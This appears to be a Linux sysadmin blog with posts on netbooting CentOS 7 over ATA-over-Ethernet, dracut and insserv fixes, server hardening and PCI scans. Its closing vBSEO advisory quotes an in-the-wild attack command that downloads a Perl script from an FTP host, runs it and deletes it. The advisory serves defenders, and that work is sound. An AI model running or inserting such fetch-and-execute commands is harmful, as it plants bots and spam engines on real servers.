Netboot CentOS 7 on ATAoE

This writeup covers the process of configuring CentOS 7 to boot seamlessly from an ATAoE target.

This is our setup:

  • TFTP server with a MAC-specific boot menu presenting the kernel and initrd. See http://www.syslinux.org/wiki/index.php/PXELINUX
  • Server exporting an LVM Logical Volume with a CentOS 7 install on it using vblade.
  • Computer to boot from the network (this computer has no hard drive and uses the exported LV as its disk).
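
For the MAC-specific boot menu, PXELINUX looks under pxelinux.cfg/ for a file named after the client's MAC address: lowercase hex, dash-separated, prefixed with the ARP hardware type (01 for Ethernet). Here is a minimal sketch of deriving that name; the function name pxe_config_name and the sample MAC are made up for illustration.

```shell
#!/bin/sh
# Print the MAC-specific config file name that PXELINUX looks for under
# pxelinux.cfg/. The "01-" prefix is the ARP hardware type for Ethernet.
# (pxe_config_name is a hypothetical helper, not part of syslinux.)
pxe_config_name() {
    # Lowercase the hex digits and turn the colons into dashes.
    mac=$(printf '%s' "$1" | tr 'A-F:' 'a-f-')
    printf '01-%s\n' "$mac"
}
```

For example, `pxe_config_name 88:99:AA:BB:CC:DD` prints `01-88-99-aa-bb-cc-dd`, which is the file to create in pxelinux.cfg/ on the TFTP server.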

Required components:

  • A kernel that supports AoE and your network card. We are using a custom-built 3.17.4 kernel. If you are building your own kernel, the AoE driver is in Device Drivers -> Block Devices and is called ATA over Ethernet Support. The driver for your network card is in Device Drivers -> Network device support -> Ethernet driver support, under the appropriate manufacturer.
  • A custom dracut module to bring up the network and discover AoE targets at boot time.
  • Packages:
    • vblade (This is only required on the server exporting the LV).
    • Dracut (dracut, dracut-network, dracut-tools)

Required Steps:

1. Install CentOS 7 onto an LV on the boot server. Since this is not in the scope of this tutorial, I will leave this part up to you. There is plenty of documentation out there (we installed it under KVM first, and exported the resulting disk as an AoE target).
2. Once you have it installed, you need to enter the environment that you deployed in step 1 to install a dracut AoE module and generate an initrd.
3. Next, make sure that you have a kernel that supports aoe and your network card. It is important that both of those kernel modules get built into your initrd or this will not work.
4. At this point (hopefully) we are in the CentOS 7 environment, whether chrooted, virtual machine, or something else; we can now install packages:

1. yum install dracut-network dracut-tools dracut
2. cd /usr/lib/dracut/modules.d/ && ls

You’ll notice that there are a bunch of folders in here, all starting with two digits. The digits signify the order in which the modules are loaded. To make sure all of the prerequisite modules are loaded, we went with 95aoe for our module directory.

3. mkdir 95aoe && cd 95aoe
4. There are 3 files that we need to create — module-setup.sh, parse-aoe.sh, and aoe-up.sh

1. Let’s start with module-setup.sh, since this is the script that will pull into the initrd all of the pieces we need for AoE to work.

#!/bin/bash
# -*- mode: shell-script; indent-tabs-mode: nil; sh-basic-offset: 4; -*-
# ex: ts=8 sw=4 sts=4 et filetype=sh

check() {
        for i in mknod ip rm bash grep sed awk seq echo mkdir; do
                type -P $i >/dev/null || return 1
        done

        return 0
}

depends() {
        echo network
        return 0
}

installkernel() {
        instmods aoe
}

install() {
        inst_multiple mknod ip rm bash grep sed awk seq echo mkdir

        inst "$moddir/aoe-up.sh" "/sbin/aoe-up"
        inst_hook cmdline 98 "$moddir/parse-aoe.sh"
        dracut_need_initqueue
}

2. Next is parse-aoe.sh. This script will load the modules and queue up our main script to be run by init.

#!/bin/sh

modprobe aoe
udevadm settle --timeout=30
/sbin/initqueue --settled --unique /sbin/aoe-up

3. Finally, we need aoe-up.sh, which is what init actually runs to bring up the network interfaces and discover the exported AoE device. Note that I am setting the MTU to 9000 on each interface, which won’t necessarily be supported on your system. If you are unsure, remove the line “ip link set dev ${INTERFACES[$i]} mtu 9000”:

#!/bin/bash

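PATH=/usr/sbin:/usr/bin:/sbin:/bin

# wait_for_if_up (used below) is defined in dracut's net-lib.sh, which the
# network module we depend on installs into the initrd.
. /lib/net-lib.sh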

exec >>/run/initramfs/loginit.pipe 2>>/run/initramfs/loginit.pipe

mkdir -p /dev/etherd
rm -f /dev/etherd/discover
mknod /dev/etherd/discover c 152 3

INTERFACES=($(ip link | grep BROADCAST | awk -F ":" '{print $2}' | sed 's/ //g'))
TOTAL_INTERFACES=${#INTERFACES[@]}

for i in `seq 0 $(($TOTAL_INTERFACES-1))`; do
    ip link set dev ${INTERFACES[$i]} mtu 9000
    ip link set ${INTERFACES[$i]} up
    wait_for_if_up ${INTERFACES[$i]}
done

ip link show

echo > /dev/etherd/discover

5. Now that we have written our AoE dracut module, we need to rebuild the initrd. Before we do this however, we need to make sure that dracut will pull in the modules we need (aoe and your NIC module). There are a few different ways to do this, but here are two options:

1. modprobe aoe && modprobe NIC_MODULE && dracut --force /boot/initramfs-KERNEL_VER.img KERNEL_VER
2. dracut --force --add-drivers aoe --add-drivers NIC_MODULE /boot/initramfs-KERNEL_VER.img KERNEL_VER
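
Whichever option you choose, it is worth confirming that both drivers really ended up in the image before you netboot. Here is a rough sketch that reads an lsinitrd listing on stdin and prints any driver it cannot find; missing_drivers is a hypothetical helper, and it assumes each module file is named after the driver (aoe.ko, aoe.ko.xz and so on), which may not hold for modules with dashes or underscores in their names.

```shell
#!/bin/sh
# Print each driver named on the command line that does not appear in an
# lsinitrd listing supplied on stdin. (Hypothetical helper for illustration.)
missing_drivers() {
    listing=$(cat)
    for drv in "$@"; do
        # Match ".../<driver>.ko", optionally followed by a compression suffix.
        printf '%s\n' "$listing" | grep -q "/${drv}\.ko" || printf '%s\n' "$drv"
    done
}

# Usage:
#   lsinitrd /boot/initramfs-KERNEL_VER.img | missing_drivers aoe NIC_MODULE
```

No output means every driver was found in the listing.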

6. Now that we have our new initrd, we need to transfer the kernel and initrd to our tftp server

1. scp /boot/initramfs-KERNEL_VER.img /boot/vmlinuz-KERNEL_VER TFTP_SERVER:/path/to/tftp
2. Make sure that permissions are set correctly (should be chmod 644)

7. Before we shut down our CentOS 7 VM, there is one last bit of configuration to adjust. Since the network must be active for us to do anything with our FS, we need to make sure that on shutdown the network isn’t brought down before the FS is unmounted. In CentOS 6, this was as easy as running `chkconfig --level 0123456 on`. CentOS 7 uses systemd, so that solution will not work. Fortunately the fix is simple (and probably works in CentOS 6 too): modify /etc/fstab, adding the option _netdev to each filesystem that lives on the AoE device (e.g. change defaults to defaults,_netdev).
8. Now we need to get vblade (http://sourceforge.net/projects/aoetools/files/vblade/) and put it on the system exporting the LV with CentOS 7 on it. If you don’t want to install it onto your system, you can just make it and run it from where you extracted it. To export the disk, just run:

1. vbladed -b 1024 -m MAC 0 1 INTERFACE /path/to/disk (for information on what each option and argument means, check out the vblade man page, which is included with the package)
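
The _netdev change from step 7 can also be scripted. Here is a minimal sketch that appends _netdev to the options field of a single fstab entry; add_netdev is a hypothetical helper. It reads fstab text on stdin and writes the result to stdout instead of editing the file in place, and it re-spaces the line it modifies with single spaces.

```shell
#!/bin/sh
# Append _netdev to the options (4th field) of the fstab entry for one mount
# point. Reads fstab text on stdin and prints the result on stdout.
# (add_netdev is a hypothetical helper for illustration.)
add_netdev() {
    awk -v mp="$1" '
        # Skip comments, match the mount point, and do not add the option twice.
        $1 !~ /^#/ && $2 == mp && $4 !~ /(^|,)_netdev(,|$)/ { $4 = $4 ",_netdev" }
        { print }
    '
}

# Usage (review the output before replacing the real file):
#   add_netdev / < /etc/fstab > /tmp/fstab.new
```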

And that’s it! At this point I recommend running dracut on your netbooted hardware to make sure everything still loads (you shouldn’t have to explicitly add the AoE module or your NIC module anymore, so verify that this is true). Don’t forget to copy the newly created initrd to the TFTP server, and I recommend not overwriting your working initrd so that you can easily go back to a known working state.

What took me days to get working should now only take you an hour or so! I tried to be as detailed as I could, and I don’t think I left anything out, but if you have any issues, please let me know and I’ll update this guide accordingly.

Show the virtual machine name in dstat instead of showing qemu

Do you run dstat to watch Linux KVM hypervisors, but wish process names showed virtual machine names?  Me too.

This patch does just that:

--- a/usr/bin/dstat	2009-11-24 01:30:11.000000000 -0800
+++ b/usr/bin/dstat	2014-11-07 10:20:09.719148833 -0800
@@ -1946,6 +1946,12 @@
         return os.path.basename(name)
     return name

+def index_containing_substring(the_list, substring):
+	for i, s in enumerate(the_list):
+		if substring in s:
+			return i
+	return -1
+
 def getnamebypid(pid, name):
     ret = None
     try:
@@ -1956,6 +1962,10 @@
         if ret.startswith('-'):
             ret = basename(cmdline[-2])
             if ret.startswith('-'): raise
+        if any("qemu" in s for s in cmdline):
+            idx = index_containing_substring(cmdline, '-name')
+            if idx >= 0:
+                ret = cmdline[idx+1]
         if not ret: raise
     except:
         ret = basename(name)
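
To see what the patch will report for a given guest without touching dstat, you can do the same lookup from the shell. This is only a sketch of the idea: qemu_guest_name is a hypothetical helper, it matches the -name argument exactly rather than by substring as the patch does, and it does not check that the process is actually qemu. Newer libvirt versions may pass something like guest=NAME,debug-threads=on as the value, in which case that whole string is printed.

```shell
#!/bin/sh
# Print the argument that follows "-name" in a NUL-separated cmdline file,
# such as /proc/PID/cmdline. (Hypothetical helper for illustration.)
qemu_guest_name() {
    tr '\0' '\n' < "$1" | awk 'prev == "-name" { print; exit } { prev = $0 }'
}

# Usage:
#   qemu_guest_name /proc/PID/cmdline
```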

CentOS6 initrd says “already mounted or /sysroot busy”

If you are booting a CentOS 6 system after having migrated its root filesystem to a new volume, you might get the following errors if /proc or /sys is missing:

EXT4-fs (dm-0): mounted filesystem with ordered data mode. Opts: 
mount: /dev/mapper/vg0-root already mounted or /sysroot busy
mount: according to mtab, /dev/mapper/vg0-root is already mounted on /sysroot
dracut: Remounting /dev/mapper/vg0-root with -o relatime,ro
EXT4-fs (dm-0): mounted filesystem with ordered data mode. Opts: 
mount: /dev/mapper/vg0-root already mounted or /sysroot busy
mount: according to mtab, /dev/mapper/vg0-root is already mounted on /sysroot
dracut: Remounting /dev/mapper/vg0-root with -o relatime,ro
EXT4-fs (dm-0): mounted filesystem with ordered data mode. Opts: 
dracut Warning: Can't mount root filesystem

To fix this, all you need to do is mount the root filesystem and “mkdir proc/ sys/”. You can even do this from inside of dracut if you add the “rdshell” argument to the end of your kernel command line:

dracut:/# mount -o remount,rw /sysroot
dracut:/# mkdir /sysroot/proc /sysroot/sys
dracut:/# mount -o remount,ro /sysroot
dracut:/# exit
(You may need to reboot the server)
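
If you still have access to the migrated volume before rebooting, a quick check can catch this ahead of time. Here is a small sketch, assuming the new root filesystem is mounted somewhere such as /mnt/newroot (a made-up path); missing_mountpoints is a hypothetical helper.

```shell
#!/bin/sh
# Print whichever of proc and sys is missing as a directory under the given
# root. (Hypothetical helper for illustration.)
missing_mountpoints() {
    for d in proc sys; do
        [ -d "$1/$d" ] || printf '%s\n' "$d"
    done
}

# Usage:
#   missing_mountpoints /mnt/newroot
```

Any name it prints needs a mkdir under that root before the system will boot.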

-Eric

Forcing insserv to start sshd early

Many distributions use `insserv` for dependency-based ordering of services at boot time.  After a bit of searching, I found very little actual documentation on the subject.  Here’s the process:

  1. Add override files to /etc/insserv/overrides/
  2. The files must contain ‘### BEGIN INIT INFO’ and ‘### END INIT INFO’, else insserv will ignore them.
  3. Some have indicated that you can override missing LSB fields with this method; however, it does require the Default-Start and Default-Stop options even though you wouldn’t expect to need to override those.
  4. The name of the file in /etc/insserv/overrides must be equal to the name in /etc/init.d, *not* the name it “Provides:”.  In an ideal world, the file name would be the same as the Provides value, but that isn’t always so.

For my purpose, I created overrides for all of my services in rc2.d with this script.  Note that the overrides are just copies of the content  from the /etc/init.d/ scripts:

cd /etc/rc2.d
# This is one long line; $f is filename, $p is the Provides value.
grep Provides * | cut -f1,3 -d: | tr -d : | while read f p; do perl -lne '$a++ if /BEGIN INIT INFO/; print if $a; $a-- if /END INIT INFO/' $f > /etc/insserv/overrides/$p;done

Note that the script writes the filename from the “Provides” field so you may need to change the filename if you have initscripts where /etc/init.d/script doesn’t match the Provides field.  Notably, Debian Wheezy does not follow this for ssh.  Provides is sshd, but the script is named ssh.
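
To find the scripts that need renaming, you can compare each init script’s file name against its Provides values. Here is a rough sketch; provides_mismatches is a hypothetical helper, and it assumes the Provides values on a line are separated by spaces.

```shell
#!/bin/sh
# List init scripts whose file name is not among their LSB "Provides:" values.
# (Hypothetical helper for illustration.)
provides_mismatches() {
    for script in "$1"/*; do
        [ -f "$script" ] || continue
        name=$(basename "$script")
        # Take the first Provides line from the LSB header, minus its prefix.
        provides=$(sed -n 's/^# *Provides:[[:space:]]*//p' "$script" | head -n 1)
        [ -n "$provides" ] || continue
        case " $provides " in
            *" $name "*) ;;                                     # name matches
            *) printf '%s provides %s\n' "$name" "$provides" ;;
        esac
    done
}

# Usage:
#   provides_mismatches /etc/init.d
```

On a system laid out like the Wheezy example above, this would print a line such as `ssh provides sshd`.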

Next, I append sshd to the Required-Start line of all of my overrides:

cd /etc/insserv/overrides/
perl -i -lne 's/(Required-Start.*)$/$1 sshd/; print' *

This of course creates a cyclic dependency for ssh, so fix that one up by hand.  Feel free to make any other boot-order preferences while you’re in the overrides directory.  For this case, ssh  was made dependent on netplug.

Finally, run `insserv` and double-check that it did what you expected:

# cat /etc/init.d/.depend.start
TARGETS = rsyslog munin-node killprocs motd sysfsutils sudo netplug rsync ssh mysql openvpn ntp wd_keepalive apache2 bootlogs cron stop-readahead-fedora watchdog single rc.local rmnologin
INTERACTIVE =
netplug: rsyslog
rsync: rsyslog
ssh: rsyslog netplug
mysql: rsyslog ssh
ntp: rsyslog ssh
[...snip...]

Voilà!  Now I can ssh to the host far earlier, before services that can take a long time to start, which makes it possible to troubleshoot if there is a problem.  In my opinion, ssh should always run directly after the network starts.

-Eric

Linux Kernel bug from 2002?

Really Old Bugs

Apparently there is a bug dating back to kernels as old as 2.5.44 that pops up every so often, costing developers hours of work to hunt down.  Hopefully it can be fixed upstream, or maybe this is a “won’t fix” for some very good reason that I am unaware of:  http://osdir.com/ml/linux.enbd.general/2002-10/msg00176.html .  In my opinion, an issue like this should give some meaningful error rather than causing deadlock.

The fix

Basically add_disk() (and therefore register_disk(), where the problem actually resides) must be called *before* set_capacity() in Linux block device drivers.  This is the reverse of what I would expect: I would configure the device parameters before publishing the device to userspace.  In the Linux kernel, though, that order can (will?) cause deadlock.

Upstream

Recently I encountered this issue/bug in a zfs-git (zfsonlinux) build.  I’ve resolved the kernel hang and I’m working on a minimal patch for ZFS.  For now follow this ZFS ZVOL issue on github: https://github.com/zfsonlinux/zfs/issues/1488 .

Update: a pull request is pending here: https://github.com/zfsonlinux/zfs/pull/1491 and a patch has been listed on the issues page.

-Eric

CVE-2013-2094: Linux Root Privilege Escalation Attack

On May 14th an attack began circulating in the wild which enables non-root users to become root on kernels 2.6.37–3.8.8 (inclusive) compiled with PERF_EVENTS, in addition to certain earlier kernels containing the bug as a backport. This only affects 64-bit operating systems.  This is the best technical writeup I have seen on the subject: CVE-2013-2094 Perf Events Exploit Explained

Ubuntu 10.04 is not affected.
RHEL 5 is not affected.
Debian Squeeze is not affected.

Known Vulnerable Distributions and Kernel Versions

NOTE: You are extra-vulnerable if you have untrusted non-root users on your server!

CentOS/RHEL kernels earlier than 2.6.32-358.6.2
If you can’t reboot, try this fix: https://access.redhat.com/site/solutions/373743

Ubuntu 12.04 3.2 kernels earlier than 3.2.0-43.68
Ubuntu 12.04 3.5 kernels earlier than 3.5.0-30.51~precise1
Ubuntu 12.10 3.5 kernels earlier than 3.5.0-30.51
Ubuntu 13.04 3.8 kernels earlier than 3.8.0-21.32

Debian Wheezy 3.2 kernels earlier than 3.2.41-2+deb7u2
Debian Jessie 3.2 kernels earlier than 3.2.41-2+deb7u2
Debian unstable 3.8 kernels earlier than 3.8.11-1

There may be other back-ported kernels which have this vulnerability, so if in doubt, update your kernel!
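
If you want to script the “earlier than” check against the versions listed above, GNU sort’s version ordering is a reasonable first approximation. This sketch is not a substitute for your package manager’s own comparison rules; version_lt is a hypothetical helper, and it assumes you feed it the installed kernel package version in the same format as the list (for example from rpm or dpkg), since uname -r carries distribution suffixes and, on Ubuntu, an ABI number in place of the package version.

```shell
#!/bin/sh
# Succeed when version $1 sorts strictly before version $2 according to
# GNU sort -V. (Hypothetical helper for illustration.)
version_lt() {
    [ "$1" != "$2" ] &&
        [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# Usage, with INSTALLED set to your kernel package version:
#   version_lt "$INSTALLED" 2.6.32-358.6.2 && echo "kernel predates the fix"
```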

Linux is Easy!

My colleague Dave Kaplan just published an eBook entitled Linux is Easy! available for preview and purchase.  Dave’s Linux interests are focused around Desktop installations and promoting Linux whenever appropriate.  Dave and I share work back-and-forth and we complement each other well; his focus is Linux-desktop whereas my service and experience is Linux-server based.

So if you landed here wondering what the Linux buzz is all about and you’d like to give Linux a spin on your desktop or laptop— just check out the eBook, download Linux Mint, and give it a spin!

-Eric

Tightening CentOS/RHEL Security

While there is far more to hardening a server than this single example, this is an often overlooked security issue in many default installations of RHEL and RHEL-based distributions (CentOS, Scientific Linux, etc.)

CentOS and RHEL come with the isdn4k-utils and coolkey packages installed by default for graphical workstations.  Unfortunately, these packages create world-writable directories from which binaries and scripts may execute.  While it is common to tighten /tmp, /var/tmp and /usr/tmp against execution attacks, these directories often go unnoticed.
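
To see which directories on a given filesystem are world-writable, a find invocation along these lines is a reasonable starting point. This is a minimal sketch; world_writable_dirs is a hypothetical wrapper, and it makes no attempt to judge which of the results are legitimate.

```shell
#!/bin/sh
# List world-writable directories below the given path without crossing into
# other filesystems. (Hypothetical helper for illustration.)
world_writable_dirs() {
    find "$1" -xdev -type d -perm -0002 2>/dev/null
}

# Usage:
#   world_writable_dirs /
#   world_writable_dirs /var
```

Expect /tmp and /var/tmp to show up; the interesting entries are the ones you did not know about.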

If you do not use these utilities (and few servers do), they can be easily removed:

yum remove isdn4k-utils coolkey

Of course if you are using these, then you should find a way to secure these mountpoints with the noexec mount option.  This can be done with a loopback filesystem mounted atop the offending mountpoints or with separate LVM volumes for each.

Traditionally, /var does not run executable code so you could mount the entire /var mountpoint as noexec.  It’s a great security practice if you can support this; however, there are some packages which expect to run their update scripts out of /var/tmp/, so be prepared to fix some broken package updates or installations.  When you do have a package error, simply mount /var as executable:

mount -o remount,rw,exec /var

install the package, and then disable execution on the mountpoint:

mount -o remount,rw,noexec /var

I recommend nosuid and nodev mount options for these types of mount points as well to restrict less common attack vectors.
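
After remounting, it is easy to forget which state a mount point was left in. Here is a small sketch for checking whether an option is currently in effect, reading /proc/mounts by default; mount_has_option is a hypothetical helper.

```shell
#!/bin/sh
# Succeed when the given mount point carries the given option in a
# /proc/mounts-style file (third argument, defaulting to /proc/mounts).
# (Hypothetical helper for illustration.)
mount_has_option() {
    awk -v mp="$1" -v opt="$2" '
        $2 == mp {
            n = split($4, o, ",")
            for (i = 1; i <= n; i++) if (o[i] == opt) found = 1
        }
        END { exit !found }
    ' "${3:-/proc/mounts}"
}

# Usage:
#   mount_has_option /var noexec || echo "/var currently allows execution"
```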

-Eric

Linux PCI Compliance: Passing the Scan

PCI Compliance Introduction

PCI compliance is required by the credit card processing industry.  If you are a merchant provider, no doubt you have been contacted by a PCI compliance scanning vendor of some form, generally sponsored by your bank or merchant provider.

Passing a PCI compliance scan is not too difficult, though there are a few technical hurdles to clear.

Server and Network Scanning

Generally speaking, you are required to answer an (excessively) long series of security questions, many of which may have no relation to your business.  Further, they obtain your server IP addresses and scan your systems for security vulnerabilities.

The report format varies, but generally you receive a brief technical description for each item, usually linked to the CVE “Common Vulnerabilities and Exposures” database.  If you are technically inclined or have technical staff who understand what should be changed to pass the scan, then you can generally resolve this internally.

If not, you are unfortunately left to your own devices: the scanning vendors do not offer support when a compliance scan fails.

Passing the PCI Compliance Scan for Linux

Keep in mind that the purpose of passing a scan isn’t just to pass: passing the scan means your server meets a minimum baseline security level for operation on the public Internet.  Not only will your merchant provider be tickled by your compliance, but your server will be more secure for the effort.

There are a series of general security practices that you can follow which will help you pass your scan and increase server security at the same time:

  • Run only the services which are absolutely necessary for your server’s operation
  • Install distribution package and security updates
  • Configure a firewall to minimize the scan surface available to the scanner or to an attacker
  • Use SSL certificates signed by a reputable certificate authority
  • Make sure intermediate SSL certificates are installed
  • Configure your SSL framework to force strong cryptographic ciphers
  • Be certain that the domain being scanned matches the common name on the certificates.  For example: if your SSL certificate is www.example.net but your website is www.example.com, then you will probably fail the PCI scan.
  • Use your web server’s document root for a single purpose.  For example, develop your new shiny website on a different or internal domain, not in the “/dev” or “/new” directory on your production site.
  • Make sure your web application is up to date—especially if your site is based on an old version of an open-source content management system such as WordPress or Joomla.
  • Dedicate one server per application function.  For example, have mail on a dedicated mail server, web on a dedicated web server.  Running both services on the same machine increases your security exposure and makes it more difficult to pass your PCI scan.

If you have followed these practices and are still having trouble passing your scan—or just want to increase your server’s security—then give me a call.  I’m always happy to help!

-Eric

vBulletin and vBSEO Exploit: Attacks in the Wild

We are seeing the use of this exploit in the wild:

vBSEO <= 3.6.0 “proc_deutf()” Remote PHP Code Injection

It’s been patched for over a year, but someone has automated scanning for vbseocp.php and hosts are getting compromised.

The fix is to update vBSEO to the latest version, and the source of the attack lives here: ./vbseo/includes/functions_vbseocp_abstract.php with improper escaping of the char_repl POST parameter.  This is vulnerable whether or not you have register_globals enabled.

The attack we are seeing takes the form of:

cd /tmp;wget ftp://user:pass@host/x.pl;curl -O ftp://user:pass@host/x.pl;perl x.pl;rm -rf x.pl

We have seen two distinct payloads: an IRC c&c bot and a spam engine executing from /tmp/.  The IRC bot sets its name as /usr/local/sbin/httpd to appear benign and makes outbound IRC connections.
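
Since the attack arrives as a POST to vbseocp.php, your web server’s access log is a good first place to look. Here is a rough sketch, assuming a combined-format access log in which the request method is the sixth whitespace-separated field and the path is the seventh; vbseocp_posts is a hypothetical helper, and the log path in the usage line is a placeholder.

```shell
#!/bin/sh
# Print "count client-address" for POST requests to vbseocp.php found in a
# combined-format access log, busiest clients first.
# (Hypothetical helper for illustration.)
vbseocp_posts() {
    awk '$6 == "\"POST" && $7 ~ /vbseocp\.php/ { print $1 }' "$1" |
        sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# Usage:
#   vbseocp_posts /path/to/access_log
```

A hit here does not prove a compromise, but it tells you which requests to inspect more closely.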

If you think you may be infected, contact us as soon as possible so we can get this removed and locked down.  Our standard countermeasures would have prevented this attack even on unpatched hosts.

-Eric